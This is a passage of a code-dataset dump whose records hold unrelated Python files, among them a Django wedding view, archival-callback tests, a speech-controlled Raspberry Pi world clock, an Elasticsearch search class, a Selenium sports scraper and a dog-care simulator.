sep=',')\n","sub_path":"q06.py","file_name":"q06.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"566524578","text":"from django.conf import settings\nfrom django.shortcuts import render\nfrom guests.save_the_date import SAVE_THE_DATE_CONTEXT_MAP\nfrom .models import Photo, SiteSection\nfrom .serializers import PhotoSerializer, SiteSectionSerializer\nfrom datetime import date\n\n\ndef home(request):\n photos = Photo.objects.all()\n sections = SiteSection.objects.all().order_by('order')\n\n photo_data = PhotoSerializer(photos, many=True).data\n section_data = SiteSectionSerializer(sections, many=True).data\n\n wedding_day = date(2019, 9, 15)\n today = date.today()\n\n days_until_wedding = (wedding_day - today).days\n\n section_test = {\n section['order']: section['content']\n for section in section_data\n }\n\n return render(request, 'home.html', context={\n 'save_the_dates': SAVE_THE_DATE_CONTEXT_MAP,\n 'support_email': settings.DEFAULT_WEDDING_REPLY_EMAIL,\n 'photos': {photo['name']: photo for photo in photo_data},\n 'days_until_wedding': days_until_wedding,\n 'sections': section_test,\n })\n","sub_path":"wedding/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"431814335","text":"from datetime import datetime\nfrom ftw.builder import Builder\nfrom ftw.builder import create\nfrom ftw.bumblebee.tests.helpers import download_token_for\nfrom ftw.testing import freeze\nfrom opengever.bumblebee.browser.callback import StoreArchivalFile\nfrom opengever.document.archival_file import STATE_FAILED_TEMPORARILY\nfrom opengever.document.archival_file import STATE_FAILED_PERMANENTLY\nfrom opengever.document.behaviors.metadata import IDocumentMetadata\nfrom opengever.testing import FunctionalTestCase\nfrom plone.namedfile.file import NamedBlobFile\nimport json\n\n\nclass TestStoreArchivalFile(FunctionalTestCase):\n\n def setUp(self):\n super(TestStoreArchivalFile, self).setUp()\n self.document = create(Builder('document')\n .titled(u'\\xdcberpr\\xfcfung XY')\n .with_dummy_content())\n\n def test_updates_archival_file_when_conversion_succeeded(self):\n with freeze(datetime(2016, 4, 25, 10, 24)):\n body = {'status': \"success\",\n 'data': \"data:application/pdf;base64,VGVzdCBTdHJpbmc=\",\n 'token': download_token_for(self.document)}\n self.request.set('BODY', json.dumps(body))\n\n view = StoreArchivalFile(self.document, self.request)\n view()\n\n archival_file = IDocumentMetadata(self.document).archival_file\n self.assertEquals('uberprufung-xy.pdf', archival_file.filename)\n self.assertTrue(isinstance(archival_file, NamedBlobFile))\n self.assertEquals('application/pdf', archival_file.contentType)\n self.assertEquals('Test String', archival_file.data)\n\n def test_sets_failed_permanently_state_when_conversion_was_skipped(self):\n with freeze(datetime(2016, 4, 25, 10, 24)):\n body = {\"status\": \"skipped\",\n \"error\": \"File is password protected.\",\n \"token\": download_token_for(self.document)}\n self.request.set('BODY', json.dumps(body))\n\n view = StoreArchivalFile(self.document, self.request)\n view()\n\n self.assertEquals(\n STATE_FAILED_PERMANENTLY,\n IDocumentMetadata(self.document).archival_file_state)\n\n def test_sets_failed_temporary_state_when_conversion_has_not_succeeded_or_skipped(self):\n with freeze(datetime(2016, 4, 25, 10, 24)):\n body = {\"status\": 
\"failed\",\n \"error\": \"Some parts of the document could not be processed\",\n \"token\": download_token_for(self.document)}\n self.request.set('BODY', json.dumps(body))\n\n view = StoreArchivalFile(self.document, self.request)\n view()\n\n self.assertEquals(\n STATE_FAILED_TEMPORARILY,\n IDocumentMetadata(self.document).archival_file_state)\n","sub_path":"opengever/bumblebee/tests/test_callback.py","file_name":"test_callback.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"5292619","text":"import time\nimport subprocess\nimport digitalio\nimport board\nfrom PIL import Image, ImageDraw, ImageFont\nimport adafruit_rgb_display.st7789 as st7789\nfrom time import strftime, sleep\nfrom datetime import datetime\nimport pytz \nfrom random import randint\nimport board\nimport busio\nfrom adafruit_bus_device.i2c_device import I2CDevice\nfrom i2c_button import I2C_Button\n\nfrom vosk import Model, KaldiRecognizer\nimport sys\nimport os\nimport wave\nimport json\nimport subprocess\ntime_zone_name = {\n \"-12\":\"New Zealand\\nStandard Time\",\n \"-11\":\"Solomon\\nStandard Time\",\n \"-10\":\"Australia\\nEastern Time\",\n \"-9\":\"Japan\\nStandard Time\",\n \"-8\":\"China\\nStandard Time\",\n \"-7\":\"Vietnam\\nStandard Time\",\n \"-6\":\"Bangladesh\\nStandard Time\",\n \"-5\":\"Pakistan\\nLahore Time\",\n \"-4\":\"Near East\\nTime\",\n \"-3\":\"Eastern African\\nTime\",\n \"-2\":\"Egypt\\nStandard Time\",\n \"-1\":\"European\\nCentral Time\",\n \"0\":\"Greenwich\\nMean Time\",\n \"1\":\"Central\\nAfrican Time\",\n \"2\":\"Fernando de\\nNoronha Time\",\n \"3\":\"Argentina\\nStandard Time\",\n \"4\":\"Puerto Rico\\nTime\",\n \"5\":\"Eastern\\nStandard Time\",\n \"6\":\"Central\\nStandard Time\",\n \"7\":\"Mountain\\nStandard Time\",\n \"8\":\"Pacific\\nStandard Time\",\n \"9\":\"Alaska\\nStandard Time\",\n \"10\":\"Hawaii\\nStandard Time\",\n \"11\":\"Midway\\nIslands Time\",\n }\n\ntime_zone_gmt = {\n \"-12\":\"Etc/GMT-12\",\n \"-11\":\"Etc/GMT-11\",\n \"-10\":\"Etc/GMT-10\",\n \"-9\":\"Etc/GMT-9\",\n \"-8\":\"Etc/GMT-8\",\n \"-7\":\"Etc/GMT-7\",\n \"-6\":\"Etc/GMT-6\",\n \"-5\":\"Etc/GMT-5\",\n \"-4\":\"Etc/GMT-4\",\n \"-3\":\"Etc/GMT-3\",\n \"-2\":\"Etc/GMT-2\",\n \"-1\":\"Etc/GMT-1\",\n \"0\":\"Etc/GMT0\",\n \"1\":\"Etc/GMT+1\", \n \"2\":\"Etc/GMT+2\",\n \"3\":\"Etc/GMT+3\",\n \"4\":\"Etc/GMT+4\",\n \"5\":\"Etc/GMT+5\",\n \"6\":\"Etc/GMT+6\",\n \"7\":\"Etc/GMT+7\",\n \"8\":\"Etc/GMT+8\",\n \"9\":\"Etc/GMT+9\",\n \"10\":\"Etc/GMT+10\",\n \"11\":\"Etc/GMT+11\",\n}\n\n\ncurrent_tz = 5\n# Configuration for CS and DC pins (these are FeatherWing defaults on M0/M4):\ncs_pin = digitalio.DigitalInOut(board.CE0)\ndc_pin = digitalio.DigitalInOut(board.D25)\nreset_pin = None\n\n# Config for display baudrate (default max is 24mhz):\nBAUDRATE = 64000000\n\n# Setup SPI bus using hardware SPI:\nspi = board.SPI()\n\n# Create the ST7789 display:\ndisp = st7789.ST7789(\n spi,\n cs=cs_pin,\n dc=dc_pin,\n rst=reset_pin,\n baudrate=BAUDRATE,\n width=135,\n height=240,\n x_offset=53,\n y_offset=40,\n)\n\ndef Speech2Text():\n wf = wave.open(\"recording.wav\", \"rb\")\n if wf.getnchannels() != 1 or wf.getsampwidth() != 2 or wf.getcomptype() != \"NONE\":\n print (\"Audio file must be WAV format mono PCM.\")\n exit (1)\n\n model = Model(\"model\")\n # You can also specify the possible word list\n rec = KaldiRecognizer(model, wf.getframerate(), \"east west day night shanghai paris tokyo\")\n\n while True:\n data = 
wf.readframes(4000)\n if len(data) == 0:\n break\n if rec.AcceptWaveform(data):\n print(rec.Result())\n else:\n print(rec.PartialResult())\n res = json.loads(rec.FinalResult())\n print (\"Speech2Text: \"+ res['text'])\n return res['text']\n\ndef ScaleImage(image):\n# Scale the image to the smaller screen dimension\n\twidth = 135\n\theight = 240\n\n\timage_ratio = image.width / image.height\n\tscreen_ratio = width / height\n\tif screen_ratio < image_ratio:\n\t scaled_width = image.width * height // image.height\n\t scaled_height = height\n\telse:\n\t scaled_width = width\n\t scaled_height = image.height * width // image.width\n\timage = image.resize((scaled_width, scaled_height), Image.BICUBIC)\n\n\t# Crop and center the image\n\tx = scaled_width // 2 - width // 2\n\ty = scaled_height // 2 - height // 2\n\timage = image.crop((x, y, x + width, y + height))\n\n\timage = image.convert('RGB')\n\timage = image.resize((240, 135),Image.BICUBIC)\n\treturn image\n\n\nif not os.path.exists(\"model\"):\n print (\"Please download the model from https://github.com/alphacep/vosk-api/blob/master/doc/models.md and unpack as 'model' in the current folder.\")\n exit (1)\n\n# Try to create an I2C device\ni2c = busio.I2C(board.SCL, board.SDA)\nprint(\"I2C ok!\")\n# ids = '\\n'.join(map(str,i2c.scan()))\n# print(f\"I2C device ID's found:\\n{ids}\")\n \nwhile not i2c.try_lock():\n pass\n \nprint(\"I2C addresses found:\", [hex(device_address) for device_address in i2c.scan()])\ni2c.unlock()\n\n# initialize the button\nbutton = I2C_Button(i2c)\nbutton.led_bright = 0\nbutton.led_gran = 1\nbutton.led_cycle_ms = 0\nbutton.led_off_ms = 0\n# Create blank image for drawing.\n# Make sure to create image with mode 'RGB' for full color.\nheight = disp.width # we swap height/width to rotate it to landscape!\nwidth = disp.height\nimage = Image.new(\"RGB\", (width, height))\nrotation = 90\n\n# Get drawing object to draw on image.\ndraw = ImageDraw.Draw(image)\n\n# Draw a black filled box to clear the image.\ndraw.rectangle((0, 0, width, height), outline=0, fill=(0, 0, 0))\ndisp.image(image, rotation)\n# Draw some shapes.\n# First define some constants to allow easy resizing of shapes.\npadding = -2\ntop = padding\nbottom = height - padding\n# Move left to right keeping track of the current x position for drawing shapes.\nx = 0\n\n# Alternatively load a TTF font. 
Make sure the .ttf font file is in the\n# same directory as the python script!\n# Some other nice fonts to try: http://www.dafont.com/bitmap.php\nfont = ImageFont.truetype(\"/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf\", 18)\n\n# Turn on the backlight\nbacklight = digitalio.DigitalInOut(board.D22)\nbacklight.switch_to_output()\nbacklight.value = True\n\nbuttonA = digitalio.DigitalInOut(board.D23)\nbuttonB = digitalio.DigitalInOut(board.D24)\nbuttonA.switch_to_input()\nbuttonB.switch_to_input()\nprevA = True\nprevB = True\nDAYNIGHT = \"day\"\nDAYNIGHTFORCE = False\nprevButton = False\nspeechInput = False\nprev_tz = current_tz\nwhile True:\n button.clear()\n time.sleep(1)\n\n if button.status.is_pressed:\n button.led_bright = 100\n if not prevButton:\n process = subprocess.Popen([\"arecord\", \"-D\", \"hw:2,0\", \"-d\", \"5\", \"-f\", \"cd\", \"recording.wav\", \"-c\", \"1\"])\n prevButton = True\n else:\n button.led_bright = 0\n if prevButton:\n process.kill()\n prevButton = False\n speechInput = True\n\n if speechInput:\n speechInput = False\n text = Speech2Text()\n if text == \"east\":\n if current_tz == -12:\n current_tz = 11\n else:\n current_tz-=1\n elif text == \"west\":\n if current_tz == 11:\n current_tz = -12\n else:\n current_tz+=1 \n elif text == \"day\":\n DAYNIGHTFORCE = True\n DAYNIGHT = \"day\"\n elif text == \"night\":\n DAYNIGHTFORCE = True\n DAYNIGHT = \"night\"\n elif text == \"shanghai\":\n current_tz = -8\n elif text == \"paris\":\n current_tz = -1 \n elif text == \"tokyo\":\n current_tz = -9 \n\n if not buttonA.value and not buttonB.value:\n current_tz = 5\n elif not buttonA.value and prevA:\n if current_tz == -12:\n current_tz = 11\n else:\n current_tz-=1\n prevA = buttonA.value\n elif not buttonB.value and prevB:\n if current_tz == 11:\n current_tz = -12\n else:\n current_tz+=1\n prevB = buttonB.value\n\n if prev_tz != current_tz:\n DAYNIGHTFORCE = False\n prev_tz = current_tz\n prevA = buttonA.value\n prevB = buttonB.value\n\n # Draw a black filled box to clear the image.\n NAME = time_zone_name[str(current_tz)] + \"\\n\"\n TIME = datetime.now(pytz.timezone(time_zone_gmt[str(current_tz)])).strftime(\"%m/%d/%Y \\n %H:%M:%S\") \n HOUR = datetime.now(pytz.timezone(time_zone_gmt[str(current_tz)])).strftime(\"%H\")\n HOUR = int(HOUR)\n\n if not DAYNIGHTFORCE:\n DAYNIGHT = \"day\"\n if HOUR >= 19 or HOUR <7:\n \tDAYNIGHT = \"night\"\n\n draw.rectangle((0, 0, width, height), outline=0, fill=0)\n img_name = str(current_tz)+ DAYNIGHT+\".jpg\"\n background = Image.open(img_name)\n background = ScaleImage(background)\n draw = ImageDraw.Draw(background)\n\n if not buttonA.value:\n draw.rectangle((0,0,width,height),outline=0,fill = \"#00FF00\")\n elif not buttonB.value:\n draw.rectangle((0,0,width,height),outline=0,fill = \"#FF0000\")\n \n #TODO: fill in here. 
You should be able to look in cli_clock.py and stats.py \n\n y=top\n EAST = \"---------\\n EAST |\\n---------\"\n WEST = \"---------\\n WEST |\\n---------\"\n draw.text((0,5),EAST, font=font, fill = \"#00FF00\")\n draw.text((0,75),WEST,font=font, fill = \"#FF0000\")\n draw.text((x+100, y+20), NAME, font=font, fill=\"#FFFFFF\")\n draw.text((x+100, y+85), TIME, font=font, fill=\"#FFFFFF\")\n\n # Display image.\n disp.image(background,rotation)\n #disp.image(image, rotation)\n #time.sleep(1)","sub_path":"Lab 3/speech_world_clock/world_clock_speech.py","file_name":"world_clock_speech.py","file_ext":"py","file_size_in_byte":9273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"199395593","text":"from elasticsearch import Elasticsearch\nimport json\nimport requests\n\nes = Elasticsearch([{'host': 'search-cchw-tuqtxpaytxyzew35b5xhuixuku.us-east-1.es.amazonaws.com', 'port': 80}])\n\n#let's iterate over swapi people documents and index them\n\nclass ESSearch():\n es = Elasticsearch([{'host': 'localhost', 'port': 9200}])\n def search(self, keyword):\n es_data = es.search(index=\"twitter\", size=2000, body={\"query\": {\"match\": {'text':{'query': keyword}}}})\n es_results = es_data['hits']['hits']\n tweets = []\n for es_result in es_results:\n tweets.append(es_result[\"_source\"])\n tweets_of_keyword = {keyword: tweets}\n return tweets_of_keyword\n\n def geosearch(self, location, distance):\n es_data = es.search(index=\"twitter\", size=2000,\n body={\n \"query\": {\n \"bool\": {\n \"must\": {\n \"match_all\": {}\n },\n \"filter\": {\n \"geo_distance\": {\n \"distance\": '%skm' % (distance),\n \"location\": location\n }\n }\n }\n }})\n es_res = es_data['hits']['hits']\n tweets = []\n for res in es_res:\n tweets.append(res[\"_source\"])\n return tweets\n ","sub_path":"essearch.py","file_name":"essearch.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"144176002","text":"'''\nSequenceManipulation Counting Sort\n484 - The Department of Redundancy Department\n\nWrite a program that will remove all duplicates from a sequence of integers and print the list of unique integers occuring in the input sequence, along with the number of occurences of each.\n'''\nif __name__ == '__main__':\n memo = {}\n printing = []\n while True:\n try:\n value = list(map(int, input().split()))\n for n in value:\n if n not in printing:\n printing.append(n)\n if n not in memo:\n memo[n] = 1\n else:\n memo[n] += 1\n except(EOFError):\n break\n printed = set()\n for i in printing:\n if i in printed:\n pass\n else:\n printed.add(i)\n print(i, memo[i])\n","sub_path":"484.py","file_name":"484.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"322164823","text":"# _*_ coding:utf-8 _*_\r\nimport time\r\nfrom selenium import webdriver\r\n\r\n# 获取直播吧,第二天篮球比赛信息\r\ndef get_next_day_basketball_game_list(url):\r\n driver = webdriver.Chrome()\r\n driver.maximize_window()\r\n driver.get(url)\r\n driver.implicitly_wait(10)\r\n\r\n time.sleep(1) # 等待页面加载\r\n # 定位第二天所在的box\r\n next_box_ele = driver.find_elements_by_class_name(\"box\")[1] # 选择第二天所在的box\r\n # 获取比赛日期\r\n playing_time_text = next_box_ele.find_element_by_tag_name(\"h2\").text\r\n print(\"比赛日期:%s\" % playing_time_text)\r\n print(\"当天的比赛信息如下:\")\r\n\r\n #获取比赛信息\r\n game_lis = next_box_ele.find_elements_by_tag_name(\"li\")\r\n for li in 
game_lis:\r\n if \"NBA\" in li.get_attribute(\"label\") or \"篮球\" in li.get_attribute(\"label\"):\r\n if \"QQ\" in li.text:\r\n game_time,game_msg,team_msg = li.text.split(\"QQ\")[0].split(\" \",maxsplit=2)\r\n if team_msg == \"\":\r\n continue\r\n elif \"CCTV\" in li.text:\r\n game_time,game_msg,team_msg = li.text.split(\"CCTV\")[0].split(\" \",maxsplit=2)\r\n if team_msg == \"\":\r\n continue\r\n print(\"game_time : %s, game_msg : %s, team_msg: %s\"%(game_time,game_msg,team_msg))\r\n #修改\r\n input(\"press enter to quit...\")\r\n driver.quit()\r\n\r\ndef main():\r\n url = \"https://www.zhibo8.cc/\"\r\n get_next_day_basketball_game_list(url)\r\n print(\"\")\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"myPythonwork/selenium_exer/从直播吧获取第二天篮球比赛对决详细.py","file_name":"从直播吧获取第二天篮球比赛对决详细.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"223430470","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport datetime\nimport logging\nimport re\nimport config \nimport classes\nfrom lib import listas\nfrom classes import *\nfrom detalhe_competicao import DetalheCompeticao\nfrom google.appengine.api import memcache\n\nclass DetalheCompeticaoIndices(DetalheCompeticao):\n\t\t\n\t# memcache vars\n\tcache_namespace = \"detalhe_competicao_indices\"\n\trender_this_page_without_main = True\n\n\t# objecto do respectivo acumulador\n\tnspace1 = \"icc\"\n\tnspace2 = \"tabela_icc\"\n\tnspace3 = \"ica\"\n\tacumulador_icc = None\n\tacumulador_tabela_icc = None\n\t\n\tdef get(self):\n\t\tself.decontaminate_vars()\n\t\tself.checkCacheFreshen()\n\t\treturn self.requestHandler()\n\t\t\n\t# este verifica acumulador, não o cmp_ultima_alteracao\n\tdef checkCacheFreshen(self):\n\t\t\n\t\tdata_cache = None # data do HTML gerado em cache\n\t\t\n\t\tself.softcache_html = memcache.get(self.cache_url, namespace=self.cache_namespace)\n\t\tif self.softcache_html:\n\t\t\tdata_cache = self.softcache_html['date']\n\t\telse:\n\t\t\tself.hardcache_html = CacheHTML.all().filter(\"cch_url = \",self.cache_url).get()\n\t\t\tif self.hardcache_html != None:\n\t\t\t\tdata_cache = self.hardcache_html.cch_date\n\t\n\t\tself.acumulador_icc = memcache.get(\"acumulador-%s-%s\" % (self.competicao, config.VERSAO_ACUMULADOR),\n\t\t namespace=self.nspace1)\n\t\t\n\t\tif not self.acumulador_icc:\n\t\t\tself.acumulador_icc = classes.getAcumuladorCompeticao(self.competicao, config.VERSAO_ACUMULADOR, self.nspace1)\n\n\t\tif data_cache and self.acumulador_icc and self.acumulador_icc.acuc_date > data_cache:\n\t\t\tself.refreshen_cache = True\n\t\t\t\n\t\tself.acumulador_ica = memcache.get(\"acumulador-%s-%s\" % (self.competicao, config.VERSAO_ACUMULADOR),\n\t\t namespace=self.nspace3)\n\n\t\tif not self.acumulador_ica:\n\t\t\tself.acumulador_ica = classes.getAcumuladorCompeticao(self.competicao, config.VERSAO_ACUMULADOR, self.nspace3)\n\n\t\tif data_cache and self.acumulador_ica and self.acumulador_ica.acuc_date > data_cache:\n\t\t\tself.refreshen_cache = True\n\t\t\n\t\tself.acumulador_tabela_icc = memcache.get(\"acumulador-%s-%s\" % (self.competicao, config.VERSAO_ACUMULADOR),\n\t\t namespace=self.nspace2)\n\t\t\n\t\tif not self.acumulador_tabela_icc:\n\t\t\tself.acumulador_tabela_icc = classes.getAcumuladorCompeticao(self.competicao, config.VERSAO_ACUMULADOR, self.nspace2)\n\n\t\tif data_cache and self.acumulador_tabela_icc and self.acumulador_tabela_icc.acuc_date > data_cache:\n\t\t\tself.refreshen_cache = True\n\n\tdef 
renderDados(self):\n\t\t# já tenho os mesu dois acumuladores, quero é populá-los com clubes e árbitros\n\t\tlista_clubes = listas.get_lista_clubes()\n\t\thash_clubes = {}\n\t\tlista_arbitros = listas.get_lista_arbitros()\n\t\thash_arbitros = {}\n\n\t\tfor clube in lista_clubes:\n\t\t\thash_clubes[clube.key().id()] = clube\n\t\tfor arbitro in lista_arbitros:\n\t\t\thash_arbitros[arbitro.key().id()] = arbitro\n\t\n\t\t# preparar a tabela de icc\t\t\n\t\t\n\t\ttabela_icc = self.acumulador_tabela_icc.acuc_content[\"tabela_icc\"]\n\t\tfor idx, val in enumerate(tabela_icc):\n\t\t\tif tabela_icc[idx].has_key(\"arb\"):\n\t\t\t\tif hash_arbitros.has_key(tabela_icc[idx][\"arb\"]):\n\t\t\t\t\ttabela_icc[idx][\"arbitro\"] = hash_arbitros[tabela_icc[idx][\"arb\"]]\n\t\t\tif tabela_icc[idx].has_key(\"clus\"):\n\t\t\t\tfor idx2, va2 in enumerate(tabela_icc[idx][\"clus\"]):\n\t\t\t\t\tif (hash_clubes.has_key(tabela_icc[idx][\"clus\"][idx2][\"clu\"])):\n\t\t\t\t\t\ttabela_icc[idx][\"clus\"][idx2][\"clube\"] = hash_clubes[tabela_icc[idx][\"clus\"][idx2][\"clu\"]]\n\n\t\t# obter a lista de clubes pela qual está ordenada a tabela_icc\n\t\t\n\t\tclubes = []\n\t\tif len(tabela_icc) > 0:\n\t\t\tfor idx, val in enumerate(tabela_icc[0][\"clus\"]):\n\t\t\t\tclubes.append(val[\"clube\"])\n\n\t\t# preparar o gráfico de icc\n\t\tgrafico_icc = self.acumulador_icc.acuc_content[\"icc\"]\n\t\tfor idx, val in enumerate(grafico_icc):\n\t\t\tgrafico_icc[idx][\"clube\"] = hash_clubes[grafico_icc[idx][\"clu\"]]\n\n\t\t# preparar o gráfico de ica\n\t\tgrafico_ica = self.acumulador_ica.acuc_content[\"ica\"]\n\t\tfor idx, val in enumerate(grafico_ica):\n\t\t\tgrafico_ica[idx][\"arbitro\"] = hash_arbitros[grafico_ica[idx][\"arb\"]]\n\n\t\tif len(grafico_ica) > 16: \n\t\t\tlist_1 = grafico_ica[:8]\n\t\t\tlist_2 = grafico_ica[-8:]\n\t\t\tfor el in list_2:\n\t\t\t\tlist_1.append(el)\n\t\t\tgrafico_ica = list_1\n\n\t\tdados = {\n\t\t\"clubes_tabela_icc\":clubes,\n\t\t\"tabela_icc\":tabela_icc,\n\t\t\"grafico_icc\":grafico_icc,\n\t\t\"grafico_ica\":grafico_ica\n\t\t}\n\t\treturn dados\n\n\tdef renderHTML(self):\n\t\t#logging.info(\"renderHTML\")\n\t\thtml = self.render_subdir('competicao','detalhe_competicao_indices.html', {\n\t\t\t\"clubes_tabela_icc\":self.dados[\"clubes_tabela_icc\"],\n\t\t\t\"tabela_icc\":self.dados[\"tabela_icc\"],\n\t\t\t\"competicao\":self.competicao,\n\t\t\t\"grafico_icc\":self.render_subdir('gera','gera_grafico_horizontal_icc.html', {\n\t\t\t\t\t\"icc_dados\": self.dados[\"grafico_icc\"],\n\t\t\t\t\t\"competicao\":self.competicao\n\t\t\t\t\t\n\t\t\t}),\n\t\t\t\"grafico_ica\":self.render_subdir('gera','gera_grafico_horizontal_ica.html', {\n\t\t\t\t\t\"ica_dados\": self.dados[\"grafico_ica\"],\n\t\t\t\t\t\"competicao\":self.competicao\n\t\t\t\t\t\n\t\t\t}),\n\t\t\t\"data\":datetime.datetime.now()\n\t\t})\n\t\treturn html\n","sub_path":"handlers/competicao/detalhe_competicao_indices.py","file_name":"detalhe_competicao_indices.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"533574030","text":"#!/usr/bin/env python3\nimport time\nimport random\n\n\nclass Dog:\n\n def __init__(self, name, breed=None):\n self.name = name\n\n if breed:\n self.breed = breed\n else:\n self.breed = 'unknown breed'\n\n self.hunger_level = 0\n\n self.is_dead = False\n self._status = None\n\n # this is 'protected' variable. 
Protected in the sense of it should be private, but not in the sense that you\n    # can't actually reference it from outside the object.\n        self._creation_time = time.time()\n        self._cause_of_death = None\n\n    def feed(self):\n        self.update_age()\n        if not self.is_dead:\n            self.hunger_level -= 1\n            if self.hunger_level < -5:\n                self.is_dead = True\n                self._cause_of_death = 'overeating'\n            elif self.hunger_level < -3:\n                print('Watch out, {} is getting fat. You should go for a walk'.format(self.name))\n                self._status = 'fat'\n            else:\n                self._status = 'well'\n        if not self.is_dead:\n            print('{} is at hunger level: {}'.format(self.name, self.hunger_level))\n        print()\n        self.dead_msg()\n\n    def walk(self):\n        self.update_age()\n        if not self.is_dead:\n            dist_walked = int(random.random() * 9) + 1\n            print('{} went on a walk for {} km.'.format(self.name, dist_walked))\n            self.hunger_level += int(dist_walked / 3)\n\n            if self.hunger_level > 8:\n                self.is_dead = True\n                self._cause_of_death = 'exhaustion'\n            elif self.hunger_level > 4:\n                print(self.name, 'is pretty tired. You should feed it.')\n                self._status = 'fatigued'\n            else:\n                self._status = 'well'\n\n        print()\n        self.dead_msg()\n\n    def update_age(self):\n        current_time = time.time()\n        if current_time - self._creation_time > 150:  # kill dog after 2.5 minutes\n            self.is_dead = True\n            self._cause_of_death = 'old age'\n\n    def dead_msg(self):\n        if self.is_dead:\n            print('Unfortunately %s has died of %s.' % (self.name, self._cause_of_death))\n\n    def get_status(self):\n        if not self._status:\n            self._status = 'well'\n        return self._status\n\n\nclass DogManager:\n    def __init__(self):\n        self._num_default_dog = 1\n        self.dog_list = []\n        self.dog_dict = {}\n\n    # technically camelCase isn't PEP-8 but it makes too much sense to not use.\n    def adoptDog(self):\n        print()\n        print('So you want to adopt a dog')\n\n        name = None\n        counter = 0\n        while not name and counter < 10:\n            name = input('What\\'s its name?: ').strip()\n            if not name:\n                # blank name. '', None, and [] evaluate to False logically\n                print('Sorry a name is required.')\n            elif name.lower() in self.dog_dict:  # lower() returns the string but all lowercased\n                print('Sorry, dogs must have unique names.')\n                print('Names already in use:')\n                for used_name in self.dog_dict:\n                    print('  ' + used_name)\n                print()\n                name = None  # reset so the loop prompts for a different name\n            counter += 1\n\n        if not name:\n            print('Too many failed attempts, a default dog will be adopted!')\n            name = 'Poochie ' + str(self._num_default_dog)\n            self._num_default_dog += 1\n            breed = None\n        else:\n            breed = input('What\\'s %s\\'s breed?: ' % name)  # if nothing entered this will be handled in init of Dog()\n        print()\n\n        dog = Dog(name, breed)\n        self.dog_list.append(dog)\n        self.dog_dict[name.lower()] = dog\n\n        if name[0].lower() in ['a', 'e', 'i', 'o', 'u']:\n            indefinite_article = 'an'\n        else:\n            indefinite_article = 'a'\n\n        print('Done. 
You\\'ve adopted ' + indefinite_article + ' {} named {}!'.format(dog.breed, dog.name))\n print()\n time.sleep(1)\n\n def feedDog(self):\n\n if self.dog_list: # if no dogs in list\n self.print_dog_house()\n print('Pick a Dog you want to Feed or \\'q\\' to go back.')\n\n while True:\n dog = None\n dog_to_feed = input('Which dog do you want to feed?: ').lower().strip()\n print()\n if dog_to_feed == 'q':\n return # exit method\n try:\n # user picked a number\n dog = self.dog_list[int(dog_to_feed)]\n except ValueError:\n try:\n dog = self.dog_dict[dog_to_feed.lower()]\n except KeyError:\n print('Could not find: ' + dog_to_feed)\n time.sleep(1)\n except KeyError:\n print('Dog {} is an invalid choice'.format(dog_to_feed))\n time.sleep(1)\n if dog:\n dog.feed()\n if not dog.is_dead:\n print('Dog Successfully Fed!')\n print()\n time.sleep(1)\n break\n\n else:\n print('You own no dogs at the moment. Please adopt one first!')\n print()\n time.sleep(1)\n\n def walkDog(self):\n if self.dog_list:\n self.print_dog_house()\n print('Pick a Dog you want to Walk or \\'q\\' to go back.')\n while True:\n dog = None\n dog_to_walk = input('Which dog do you want to walk?: ').lower().strip()\n print()\n if dog_to_walk == 'q':\n return # exit method\n\n try:\n # user picked a number\n dog = self.dog_list[int(dog_to_walk)]\n except ValueError:\n try:\n dog = self.dog_dict[dog_to_walk.lower()]\n except KeyError:\n print('Could not find: ' + dog_to_walk)\n except IndexError:\n print('Dog {} is an invalid choice'.format(dog_to_walk))\n if dog:\n dog.walk()\n if not dog.is_dead:\n print('Dog Successfully Walked!')\n print()\n time.sleep(1)\n break\n else:\n print('You don\\'t own any dogs at the moment. Please adopt one first!')\n print()\n time.sleep(1)\n\n def print_dog_house(self):\n if self.dog_list:\n print('You have', len(self.dog_list), 'dog(s) right now:')\n for ind, dog in enumerate(self.dog_list):\n if dog.is_dead:\n status = 'Dead'\n else:\n # Alive\n dog_status = dog.get_status()\n if dog_status.lower().strip() != 'well':\n status = 'Alive but ' + dog_status\n else:\n status = 'Alive and ' + dog_status\n\n status += ' - hunger_level = {}'.format(dog.hunger_level)\n print(' ' + str(ind) + ': ' + dog.name + ' - ' + status)\n print()\n else:\n print('You don\\'t own any dogs at the moment. Please adopt one first!')\n print()\n\n\nif __name__ == '__main__':\n print()\n print('Welcome to Super Easy Dog Simulator')\n print()\n options = 'Options:\\n\\n' \\\n '1: Adopt Dog\\n' \\\n '2: Feed Dog\\n' \\\n '3: Walk Dog\\n' \\\n '4: Check On Dogs \\n' \\\n '\\n' \\\n 'q: Quit'\n\n dog_manager = DogManager()\n while True:\n print(options)\n decision = input('Your Choice: ').strip() # strip() takes out leading and trailing whitespace\n print()\n if decision == '1':\n dog_manager.adoptDog()\n elif decision == '2':\n dog_manager.feedDog()\n elif decision == '3':\n dog_manager.walkDog()\n elif decision == '4':\n dog_manager.print_dog_house()\n time.sleep(1)\n elif decision == 'q':\n break\n else:\n print('Sorry.', decision, 'is an invalid decision. Try Again')\n print()\n time.sleep(.5)\n print()\n print('Thank You For Using Super Easy Dog Simulator. 
